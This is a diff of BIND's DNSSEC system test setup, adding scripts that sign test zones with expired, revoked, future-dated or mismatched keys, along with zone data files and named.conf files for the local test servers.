+kskname=$("$KEYGEN" -q -3 -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -fk "$zone") +zskname=$("$KEYGEN" -q -3 -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +cat "$infile" "$kskname.key" "$zskname.key" > "$zonefile" +"$SIGNER" -P -3 - -o "$zone" "$zonefile" > /dev/null + +# +# Secure below cname test zone. +# +zone=secure.below-cname.example. +infile=secure.below-cname.example.db.in +zonefile=secure.below-cname.example.db +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +cat "$infile" "$keyname.key" > "$zonefile" +"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null + +# +# Patched TTL test zone. +# +zone=ttlpatch.example. +infile=ttlpatch.example.db.in +zonefile=ttlpatch.example.db +signedfile=ttlpatch.example.db.signed +patchedfile=ttlpatch.example.db.patched + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -f $signedfile -o "$zone" "$zonefile" > /dev/null +$CHECKZONE -D -s full "$zone" $signedfile 2> /dev/null | \ + awk '{$2 = "3600"; print}' > $patchedfile + +# +# Separate DNSSEC records. +# +zone=split-dnssec.example. +infile=split-dnssec.example.db.in +zonefile=split-dnssec.example.db +signedfile=split-dnssec.example.db.signed + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +cat "$infile" "$keyname.key" > "$zonefile" +echo "\$INCLUDE \"$signedfile\"" >> "$zonefile" +: > "$signedfile" +"$SIGNER" -P -D -o "$zone" "$zonefile" > /dev/null + +# +# Separate DNSSEC records smart signing. +# +zone=split-smart.example. +infile=split-smart.example.db.in +zonefile=split-smart.example.db +signedfile=split-smart.example.db.signed + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +cp "$infile" "$zonefile" +# shellcheck disable=SC2016 +echo "\$INCLUDE \"$signedfile\"" >> "$zonefile" +: > "$signedfile" +"$SIGNER" -P -S -D -o "$zone" "$zonefile" > /dev/null + +# +# Zone with signatures about to expire, but no private key to replace them +# +zone="expiring.example." +infile="expiring.example.db.in" +zonefile="expiring.example.db" +signedfile="expiring.example.db.signed" +kskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +zskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK "$zone") +cp "$infile" "$zonefile" +"$SIGNER" -S -e now+1mi -o "$zone" "$zonefile" > /dev/null +mv -f "${zskname}.private" "${zskname}.private.moved" +mv -f "${kskname}.private" "${kskname}.private.moved" + +# +# A zone where the signer's name has been forced to uppercase. +# +zone="upper.example." +infile="upper.example.db.in" +zonefile="upper.example.db" +lower="upper.example.db.lower" +signedfile="upper.example.db.signed" +kskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +zskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK "$zone") +cp "$infile" "$zonefile" +"$SIGNER" -P -S -o "$zone" -f $lower "$zonefile" > /dev/null +$CHECKZONE -D upper.example $lower 2>/dev/null | \ + sed '/RRSIG/s/ upper.example. / UPPER.EXAMPLE. /' > $signedfile + +# +# Check that the signer's name is in lower case when zone name is in +# upper case. +# +zone="LOWER.EXAMPLE." +infile="lower.example.db.in" +zonefile="lower.example.db" +signedfile="lower.example.db.signed" +kskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +zskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK "$zone") +cp "$infile" "$zonefile" +"$SIGNER" -P -S -o "$zone" "$zonefile" > /dev/null + +# +# Zone with signatures about to expire, and dynamic, but configured +# not to resign with 'auto-resign no;' +# +zone="nosign.example." +infile="nosign.example.db.in" +zonefile="nosign.example.db" +signedfile="nosign.example.db.signed" +kskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +zskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK "$zone") +cp "$infile" "$zonefile" +"$SIGNER" -S -e "now+1mi" -o "$zone" "$zonefile" > /dev/null +# preserve a normalized copy of the NS RRSIG for comparison later +$CHECKZONE -D nosign.example nosign.example.db.signed 2>/dev/null | \ + awk '$4 == "RRSIG" && $5 == "NS" {$2 = ""; print}' | \ + sed 's/[ ][ ]*/ /g'> ../nosign.before + +# +# An inline signing zone +# +zone=inline.example. +kskname=$("$KEYGEN" -q -3 -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -fk "$zone") +zskname=$("$KEYGEN" -q -3 -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") + +# +# publish a new key while deactivating another key at the same time. +# +zone=publish-inactive.example +infile=publish-inactive.example.db.in +zonefile=publish-inactive.example.db +now=$(date -u +%Y%m%d%H%M%S) +kskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK "$zone") +kskname=$("$KEYGEN" -P "$now+90s" -A "$now+3600s" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK "$zone") +kskname=$("$KEYGEN" -I "$now+90s" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK "$zone") +zskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +cp "$infile" "$zonefile" +"$SIGNER" -S -o "$zone" "$zonefile" > /dev/null + +# +# A zone which will change its sig-validity-interval +# +zone=siginterval.example +infile=siginterval.example.db.in +zonefile=siginterval.example.db +kskname=$("$KEYGEN" -q -3 -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -fk "$zone") +zskname=$("$KEYGEN" -q -3 -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +cp "$infile" "$zonefile" + +# +# A zone with a bad DS in the parent +# (sourced from bogus.example.db.in) +# +zone=badds.example. +infile=bogus.example.db.in +zonefile=badds.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null +sed -e 's/bogus/badds/g' < dsset-bogus.example$TP > dsset-badds.example$TP + +# +# A zone with future signatures. +# +zone=future.example +infile=future.example.db.in +zonefile=future.example.db +kskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK "$zone") +zskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +cat "$infile" "$kskname.key" "$zskname.key" > "$zonefile" +"$SIGNER" -P -s +3600 -o "$zone" "$zonefile" > /dev/null +cp -f "$kskname.key" trusted-future.key + +# +# A zone with future signatures. +# +zone=managed-future.example +infile=managed-future.example.db.in +zonefile=managed-future.example.db +kskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK "$zone") +zskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +cat "$infile" "$kskname.key" "$zskname.key" > "$zonefile" +"$SIGNER" -P -s +3600 -o "$zone" "$zonefile" > /dev/null + +# +# A zone with a revoked key +# +zone=revkey.example. +infile=generic.example.db.in +zonefile=revkey.example.db + +ksk1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -3fk "$zone") +ksk1=$("$REVOKE" "$ksk1") +ksk2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -3fk "$zone") +zsk1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -3 "$zone") + +cat "$infile" "${ksk1}.key" "${ksk2}.key" "${zsk1}.key" > "$zonefile" +"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null + +# +# Check that NSEC3 are correctly signed and returned from below a DNAME +# +zone=dname-at-apex-nsec3.example +infile=dname-at-apex-nsec3.example.db.in +zonefile=dname-at-apex-nsec3.example.db + +kskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -3fk "$zone") +zskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -3 "$zone") +cat "$infile" "${kskname}.key" "${zskname}.key" >"$zonefile" +"$SIGNER" -P -3 - -o "$zone" "$zonefile" > /dev/null + +# +# A NSEC zone with occuded data at the delegation +# +zone=occluded.example +infile=occluded.example.db.in +zonefile=occluded.example.db +kskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -fk "$zone") +zskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" "$zone") +dnskeyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -fk "delegation.$zone") +keyname=$("$KEYGEN" -q -a DH -b 1024 -n HOST -T KEY "delegation.$zone") +$DSFROMKEY "$dnskeyname.key" > "dsset-delegation.${zone}$TP" +cat "$infile" "${kskname}.key" "${zskname}.key" "${keyname}.key" \ + "${dnskeyname}.key" "dsset-delegation.${zone}$TP" >"$zonefile" +"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null diff --git a/bin/tests/system/dnssec/ns3/split-dnssec.example.db.in b/bin/tests/system/dnssec/ns3/split-dnssec.example.db.in new file mode 100644 index 0000000..55b3877 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/split-dnssec.example.db.in @@ -0,0 +1,38 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a A 10.0.0.3 +*.wild A 10.0.0.6 +child NS ns2.example. +insecure NS ns.insecure +ns.insecure A 10.53.0.3 +secure NS ns.secure +ns.secure A 10.53.0.3 +nsec3 NS ns.nsec3 +ns.nsec3 A 10.53.0.3 +optout NS ns.optout +ns.optout A 10.53.0.3 +02HC3EM7BDD011A0GMS3HKKJT2IF5VP8 A 10.0.0.17 diff --git a/bin/tests/system/dnssec/ns3/split-smart.example.db.in b/bin/tests/system/dnssec/ns3/split-smart.example.db.in new file mode 100644 index 0000000..55b3877 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/split-smart.example.db.in @@ -0,0 +1,38 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a A 10.0.0.3 +*.wild A 10.0.0.6 +child NS ns2.example. +insecure NS ns.insecure +ns.insecure A 10.53.0.3 +secure NS ns.secure +ns.secure A 10.53.0.3 +nsec3 NS ns.nsec3 +ns.nsec3 A 10.53.0.3 +optout NS ns.optout +ns.optout A 10.53.0.3 +02HC3EM7BDD011A0GMS3HKKJT2IF5VP8 A 10.0.0.17 diff --git a/bin/tests/system/dnssec/ns3/ttlpatch.example.db.in b/bin/tests/system/dnssec/ns3/ttlpatch.example.db.in new file mode 100644 index 0000000..14971bd --- /dev/null +++ b/bin/tests/system/dnssec/ns3/ttlpatch.example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 diff --git a/bin/tests/system/dnssec/ns3/unsupported-algorithm.key b/bin/tests/system/dnssec/ns3/unsupported-algorithm.key new file mode 100644 index 0000000..cc8bb9a --- /dev/null +++ b/bin/tests/system/dnssec/ns3/unsupported-algorithm.key @@ -0,0 +1 @@ +dnskey-unsupported-2.example. IN DNSKEY 257 3 255 BJ0eV4dQC0pihdFXiVdlXjPDkzbv4fC+opEvK0RaDU7LLwFXPAi6DOc6tm7vcSr5Tgdnpoal3S4WqHuVw6I1pzy5mPPIZ3OpLSY/QeOyGc2QRAZtOXxiGxERHRjyAk7emlgGscM0Vty2oJVYRgTPX0lTwKX/V2H+mjEgp7u3tyG3cj5XBUQ8J0KUoqkrn1ZKrizH27aWiDaBUvqxJUcotaDhnydkNtcHoQIedm2b4qbyTQsdRkddJiSWxpveEcj3AMdt2PjU6Q4rgSWOc5ylPnW/O+GqqCEAkalGSF7ud0Nl3FVVR9iGwV/73FHzpBLawfkcHaODFmKRjzGqok8giKCih2vdNsxlx7gdJWJIPYYx/ZqNGc2ewzuAnnleJpZdXFo8uL3HYk6Pl51sSkfVUmcn/SM+ ;{id = 38688 (ksk), size = 768b} diff --git a/bin/tests/system/dnssec/ns3/update-nsec3.example.db.in b/bin/tests/system/dnssec/ns3/update-nsec3.example.db.in new file mode 100644 index 0000000..a7792fd --- /dev/null +++ b/bin/tests/system/dnssec/ns3/update-nsec3.example.db.in @@ -0,0 +1,40 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a + +private NS ns.private +ns.private A 10.53.0.2 + +insecure NS ns.insecure +ns.insecure A 10.53.0.2 + +nosoa NS ns.nosoa +ns.nosoa A 10.53.0.7 + +normalthenrrsig A 10.0.0.28 +rrsigonly A 10.0.0.29 diff --git a/bin/tests/system/dnssec/ns3/upper.example.db.in b/bin/tests/system/dnssec/ns3/upper.example.db.in new file mode 100644 index 0000000..ec6603a --- /dev/null +++ b/bin/tests/system/dnssec/ns3/upper.example.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2012042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +@ NS ns +ns A 10.53.0.3 diff --git a/bin/tests/system/dnssec/ns4/managed-keys.bind.in b/bin/tests/system/dnssec/ns4/managed-keys.bind.in new file mode 100644 index 0000000..570669d --- /dev/null +++ b/bin/tests/system/dnssec/ns4/managed-keys.bind.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 0 ; 0 seconds +@ IN SOA . . ( + 2 ; serial + 0 ; refresh (0 seconds) + 0 ; retry (0 seconds) + 0 ; expire (0 seconds) + 0 ; minimum (0 seconds) + ) + KEYDATA 20221028094934 19700101000000 19700101000000 0 0 0 ; placeholder diff --git a/bin/tests/system/dnssec/ns4/named1.conf.in b/bin/tests/system/dnssec/ns4/named1.conf.in new file mode 100644 index 0000000..212ef85 --- /dev/null +++ b/bin/tests/system/dnssec/ns4/named1.conf.in @@ -0,0 +1,61 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS4 + +options { + query-source address 10.53.0.4 dscp 1; + notify-source 10.53.0.4 dscp 2; + transfer-source 10.53.0.4 dscp 3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + dnssec-must-be-secure mustbesecure.example yes; + minimal-responses no; + + nta-lifetime 12s; + nta-recheck 9s; + + validate-except { corp; }; + + # Note: We only reference the bind.keys file here to confirm that it + # is *not* being used. It contains the real root key, and we're + # using a local toy root zone for the tests, so it wouldn't work. + # But since dnssec-validation is set to "yes" not "auto", that + # won't matter. + bindkeys-file "../../../../../bind.keys"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "corp" { + type static-stub; + server-addresses { 10.53.0.2; }; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/dnssec/ns4/named2.conf.in b/bin/tests/system/dnssec/ns4/named2.conf.in new file mode 100644 index 0000000..3369b6b --- /dev/null +++ b/bin/tests/system/dnssec/ns4/named2.conf.in @@ -0,0 +1,43 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS4 + +options { + query-source address 10.53.0.4 dscp 4; + notify-source 10.53.0.4 dscp 5; + transfer-source 10.53.0.4 dscp 6; + dscp 16; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation auto; + bindkeys-file "managed.conf"; + minimal-responses no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/dnssec/ns4/named3.conf.in b/bin/tests/system/dnssec/ns4/named3.conf.in new file mode 100644 index 0000000..d6eaa01 --- /dev/null +++ b/bin/tests/system/dnssec/ns4/named3.conf.in @@ -0,0 +1,43 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS4 + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation auto; + bindkeys-file "managed.conf"; + dnssec-accept-expired yes; + minimal-responses no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/dnssec/ns4/named4.conf.in b/bin/tests/system/dnssec/ns4/named4.conf.in new file mode 100644 index 0000000..db42f23 --- /dev/null +++ b/bin/tests/system/dnssec/ns4/named4.conf.in @@ -0,0 +1,78 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS4 + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +key auth { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +include "trusted.conf"; + +view rec { + match-recursive-only yes; + recursion yes; + dnssec-validation yes; + dnssec-accept-expired yes; + minimal-responses no; + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone secure.example { + type static-stub; + server-addresses { 10.53.0.4; }; + }; + + zone insecure.secure.example { + type static-stub; + server-addresses { 10.53.0.4; }; + }; +}; + +view auth { + recursion no; + allow-recursion { none; }; + + zone secure.example { + type secondary; + primaries { 10.53.0.3; }; + }; + + zone insecure.secure.example { + type secondary; + primaries { 10.53.0.2; }; + }; +}; diff --git a/bin/tests/system/dnssec/ns4/named5.conf.in b/bin/tests/system/dnssec/ns4/named5.conf.in new file mode 100644 index 0000000..2be2f02 --- /dev/null +++ b/bin/tests/system/dnssec/ns4/named5.conf.in @@ -0,0 +1,39 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS4 + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + bindkeys-file "managed.conf"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +key auth { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; diff --git a/bin/tests/system/dnssec/ns5/named1.conf.in b/bin/tests/system/dnssec/ns5/named1.conf.in new file mode 100644 index 0000000..deec9c2 --- /dev/null +++ b/bin/tests/system/dnssec/ns5/named1.conf.in @@ -0,0 +1,43 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS5 + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/dnssec/ns5/named2.conf.in b/bin/tests/system/dnssec/ns5/named2.conf.in new file mode 100644 index 0000000..f334e16 --- /dev/null +++ b/bin/tests/system/dnssec/ns5/named2.conf.in @@ -0,0 +1,52 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS5 + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; 127.0.0.1; }; + listen-on-v6 { none; }; + recursion yes; +}; + +view root { + match-destinations { 127.0.0.1; }; + + zone "." { + type primary; + file "root.db.signed"; + }; +}; + +view other { +include "revoked.conf"; + + zone "." { + type static-stub; + server-addresses { 127.0.0.1; }; + }; +}; diff --git a/bin/tests/system/dnssec/ns5/sign.sh b/bin/tests/system/dnssec/ns5/sign.sh new file mode 100644 index 0000000..6a6df03 --- /dev/null +++ b/bin/tests/system/dnssec/ns5/sign.sh @@ -0,0 +1,39 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +echo_i "ns5/sign.sh" + +zone=. +infile=../ns1/root.db.in +zonefile=root.db.signed + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK "$zone") + +# copy the KSK out first, then revoke it +keyfile_to_initial_ds "$keyname" > revoked.conf + +"$SETTIME" -R now "${keyname}.key" > /dev/null + +# create a current set of keys, and sign the root zone +"$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" $zone > /dev/null +"$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK $zone > /dev/null +"$SIGNER" -S -o "$zone" -f "$zonefile" "$infile" > /dev/null 2>&1 + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone ".") + +keyfile_to_static_ds "$keyname" > trusted.conf diff --git a/bin/tests/system/dnssec/ns6/named.args b/bin/tests/system/dnssec/ns6/named.args new file mode 100644 index 0000000..65b7dbc --- /dev/null +++ b/bin/tests/system/dnssec/ns6/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -D dnssec-ns6 -X named.lock -g -T maxcachesize=2097152 -T nonearest -T tat=1 diff --git a/bin/tests/system/dnssec/ns6/named.conf.in b/bin/tests/system/dnssec/ns6/named.conf.in new file mode 100644 index 0000000..4bdc79c --- /dev/null +++ b/bin/tests/system/dnssec/ns6/named.conf.in @@ -0,0 +1,40 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS6 + +options { + query-source address 10.53.0.6; + notify-source 10.53.0.6; + transfer-source 10.53.0.6; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.6; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; + disable-algorithms . { @ALTERNATIVE_ALGORITHM@; }; + dnssec-validation yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "optout-tld" { + type primary; + file "optout-tld.db.signed"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/dnssec/ns6/optout-tld.db.in b/bin/tests/system/dnssec/ns6/optout-tld.db.in 